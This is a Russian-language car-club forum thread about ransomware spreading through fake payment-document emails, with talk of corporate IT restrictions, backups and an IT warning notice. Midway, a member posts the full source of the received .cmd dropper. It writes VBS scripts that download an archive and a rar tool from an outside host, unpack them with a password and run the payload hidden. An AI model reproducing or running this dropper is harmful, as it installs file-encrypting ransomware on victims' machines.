0
![Вы не можете благодарить!](images/buttons/up_dis.png)
Спасибо: |
Получено: 319 Отправлено: 115 |
Хороша та машина, которая ездит. Вот у меня две и обе ездят - я доволен
Спасибо: |
Получено: 6,646 Отправлено: 14,554 |
Там сцыль на форум. Ты мне письмо с вирусом скинь плз - очень стало интересно
Охота пуще неволи![]()
Спасибо: |
Получено: 1,500 Отправлено: 875 |
Кэп это cmd файлты хочешь чтобы криптер тебя спрашивал - вы действительно хотите попандоса на 600 евро или подумаете?
Заставил задумацццаЗря. Если тебе именно диагностические проги нужны - можно, конечно попробовать их в коробке запустить, и, если не пошли - накатить второй системой винды (только в обратном порядке). При всем при этом винды вообще оффлайновыми сделать, убить тысячи системного мусора, и радоваться жизни![]()
нас без сомнения ждут приключения, мы ведь не любим скучать..
![]()
Спасибо: |
Получено: 1,029 Отправлено: 293 |
Ну не заплатишь ту курице 10 тыр ее зарплаты, она уволится. А вся система сдохла.... ладно если один комп только слетит.
С людской тупостью нифига не сделаешь. 90% людей по умственному развитию отстают от куриц![]()
Спасибо: |
Получено: 6,646 Отправлено: 14,554 |
\
В легкую.
На нашем отделении железной дороги обслугой компов занимается специально созданная контора. Политики безопасности грузятся при запуске виндов только с их серверов, заперты на использование любых портов, запрет на запуск почти любых программ, явно не разрешенных, любая активность уровнем выше чем "тупой юзверь" блокируется и руководителю подразделения высылается письмо-указивка с требованием разобраться и наказать, независимо от того, какой вид активности был - пинг ли из командной строки или попытка слить из интранета справочник на 200 мегов.
А, и еще ограничение размеров писем запилено. Раньше было 2 мега, потом, когда я уже уходил, было 6 мегов....Как сейчас - не знаю, но наше отделение было по сети дорог лидером в плане отсутствия сетевого мусора, елочек на новый год и прочего разного
Спасибо: |
Получено: 1,500 Отправлено: 875 |
Дай контакт конторки клубню в Питер, а то их курицы только в минус работают\
В легкую.
На нашем отделении железной дороги обслугой компов занимается специально созданная контора. Политики безопасности грузятся при запуске виндов только с их серверов, заперты на использование любых портов, запрет на запуск почти любых программ, явно не разрешенных, любая активность уровнем выше чем "тупой юзверь" блокируется и руководителю подразделения высылается письмо-указивка с требованием разобраться и наказать, независимо от того, какой вид активности был - пинг ли из командной строки или попытка слить из интранета справочник на 200 мегов.
А, и еще ограничение размеров писем запилено. Раньше было 2 мега, потом, когда я уже уходил, было 6 мегов....Как сейчас - не знаю, но наше отделение было по сети дорог лидером в плане отсутствия сетевого мусора, елочек на новый год и прочего разного![]()
нас без сомнения ждут приключения, мы ведь не любим скучать..
![]()
Спасибо: |
Получено: 1,029 Отправлено: 293 |
Ню ню.
Я не спец в компах, но мой опыт подсказывает, что в любом вопросе тупицы могут наделать такого, что спец даже за деньги не сможет.
а чем открытие файла rar выходит за рамки юзверя???? или все-таки выходит![]()
Спасибо: |
Получено: 6,646 Отправлено: 14,554 |
Листинг исполняемого файла. Я ОЧЕНЬ-ОЧЕНЬ надеюсь, что ни у кого ничего не произойдет и наш клуб не упадет
--- Добавлено чуть позже ---echo off
rem
if exist c:\winsys goto byye
rem
set PPP=WshShell.Run
rem
set ppp1="c:\winsys\xrar.cmd"
rem
set ppp2=Chr(34)
rem
set ppp3=,
rem
set ppp4=0
rem
set dire=%~dp0
echo error in pdf file>%cd%\Proverka_dannih_po_oplate.pdf
rem
set dire=%cd%
mkdir c:\winsys
cd c:\
cd winsys
echo document>doc18-06.pdf
start doc18-06.pdf
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>>c:\winsys\x.vbs
echo dim taraStrm: Set taraStrm = createobject("Adodb.Stream")>>c:\winsys\x.vbs
echo xHttp.Open "GET", "http://net2ftp.ru/node0/jettikayr@gmail.com/arc.rar", False>>c:\winsys\x.vbs
echo xHttp.Send>>c:\winsys\x.vbs
echo with taraStrm>>c:\winsys\x.vbs
echo .type = 1 '//binary>>c:\winsys\x.vbs
echo .open>>c:\winsys\x.vbs
echo .write xHttp.responseBody>>c:\winsys\x.vbs
echo .savetofile "c:\winsys\arc.rar", 2 '//overwrite>>c:\winsys\x.vbs
echo end with>>c:\winsys\x.vbs
echo Set WshShell = CreateObject("WScript.Shell")>>c:\winsys\wonc.vbs
echo %PPP% %ppp2% ^& %ppp1% ^& %ppp2%%ppp3% %ppp4% >>c:\winsys\wonc.vbs
echo Set WshShell = Nothing>>c:\winsys\wonc.vbs
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>>c:\winsys\xx.vbs
echo dim taraStrm: Set taraStrm = createobject("Adodb.Stream")>>c:\winsys\xx.vbs
echo xHttp.Open "GET", "http://net2ftp.ru/node0/jettikayr@gmail.com/Rar", False>>c:\winsys\xx.vbs
echo xHttp.Send>>c:\winsys\xx.vbs
echo with taraStrm>>c:\winsys\xx.vbs
echo .type = 1 '//binary>>c:\winsys\xx.vbs
echo .open>>c:\winsys\xx.vbs
echo .write xHttp.responseBody>>c:\winsys\xx.vbs
echo .savetofile "c:\winsys\Rar", 2 '//overwrite>>c:\winsys\xx.vbs
echo end with>>c:\winsys\xx.vbs
x.vbs
xx.vbs
ren rar rar.exe
rar e -p123123 arc.rar
c:\winsys\wonc.vbs
echo %dire%
echo þþþ>%dire%\Proverka_dannih_po_oplate.cmd
:byye
start c:\winsys\doc18-06.pdf
rem
rem
Не...они только по железной дороге работают, это во первых, а во вторых питерское подразделение этой конторы - самое разгильдяйское
Когда юзеру разрешено только снимать почту, открывать офисные файлы и шевелить мышкой, то там сложно чего то сделатьУ меня даже скриптик самопальный по созданию рекурсии мегабайтных папок не запускался
ТАкие фалы у рждшников отсекаются на уровне почтового сервера. У меня, кстати, в аутглюке поставлено просто удаление всех файлов, отличающихся от офисных, фото и еще там чего то. Точнее закрыты к исполнению все батники, комы, дллы и прочие сус с экзешниками.
Спасибо: |
Получено: 1,500 Отправлено: 875 |
Ну судя по описалову это trojan encoder 556![]()
нас без сомнения ждут приключения, мы ведь не любим скучать..
![]()
Спасибо: |
Получено: 1,500 Отправлено: 875 |
А вот интересно. Он же файлы архивирует...а оригинал удаляет. А если попытаться восстановить оригинал?![]()
нас без сомнения ждут приключения, мы ведь не любим скучать..
![]()
Спасибо: |
Получено: 1,955 Отправлено: 1,239 |
А он тебе даст boot from cd?
BMW 528i е39 M52TU R6 акпп, X5 e53 M57TU 3.0 акпп.
Спасибо: |
Получено: 1,500 Отправлено: 875 |
Skodник, зачем бут фром сиди?![]()
нас без сомнения ждут приключения, мы ведь не любим скучать..
![]()
Спасибо: |
Получено: 6,646 Отправлено: 14,554 |
Спасибо: |
Получено: 54 Отправлено: 32 |
На работе на корпаративной почте про такие письма служба IT наверно с нового года предупреждает всех, один фиг народ умудряется открывать файлы.
Буквально вчера пришло новое предупреждение про вариант со скачиванием:
Уважаемые пользователи!
С 16.06.2015 г. на электронную почту пользователей промплощадки Санкт-Петербурга стали приходить очередные версии писем, содержащих ссылки на вредоносный код. Пример письма ниже:
При открытии ссылок из такого письма, скачивании архивов с «информацией», распаковывании этих архивов происходит шифрование фалов на вашем ПК.
Призываем вас быть бдительными и не открывать ссылки и вложения, содержащиеся в письмах от неизвестных адресатов.
При малейшем подозрении на содержание письма запросите подтверждение у отправителя любым альтернативным способом (телефон, Lync, Skype, СМС, электронная почта…) и, в случае отсутствия такового, удалите письмо.
При обнаружении заражения:
1. Немедленно выключите питание компьютера и отключите его от вычислительной сети. Это предотвратит шифрование данных как на вашем локальном диске, так и на сетевых папках, подключенных к ПК. Процедура шифрования происходит не одномоментно, а занимает определённое время;
2. Обратитесь в службу технической поддержки.
Служба поддержки пользователей
VW Passat B-55 - был...
Skoda Scout A5FL 4x4 - утрачен...
Skoda Octavia A7 1.8T DSG - теперь....
Спасибо: |
Получено: 1,955 Отправлено: 1,239 |
tahoe, причем письма прихолили раньше с созданных емейлов, теперь приходят с реальных, взломанных почтовых адресов компаний!
--- Добавлено чуть позже ---
Подожди до утра, должен придти ехе акт сверки!
--- Добавлено чуть позже ---
А как восстановить?
BMW 528i е39 M52TU R6 акпп, X5 e53 M57TU 3.0 акпп.
Спасибо: |
Получено: 1,500 Отправлено: 875 |
Спасибо: |
Получено: 3,425 Отправлено: 4,218 |
вам и сайты подкидываю где расписано про заработки на таких и так на форуме пишется как и что...
неужели с Мусей валерьянкой балуешься
сочувствую, у нас права разграничены и идет бекап каждые два часа всех файлов, нагрузка большая конечно IT оборудование, зато опа гореть не будет
--- Добавлено чуть позже ---
незря же сбрутили столько адресов, пароли все сменили?
Спасибо: |
Получено: 7,067 Отправлено: 8,816 |
Ты короче будешь, баянист годаВ последнее время очень много приходит писем с вложениями в виде файлов в формате exe, cmd, rar.
При открытии все файлы компьютера зашифровываются.
Расшифровка своими силами не получается. Люди платят.
Адреса получателей реальные, даже телефоны есть, но люди не в курсе.. сами в шоке от взлома!
Понятно что старый развод, будьте внимательнее!
http://www.yaplakal.com/forum32/topic892670.html![]()
Если вам во мне что-то не нравится — не обязательно ставить меня об этом в известность. Постарайтесь пережить этот шок самостоятельно!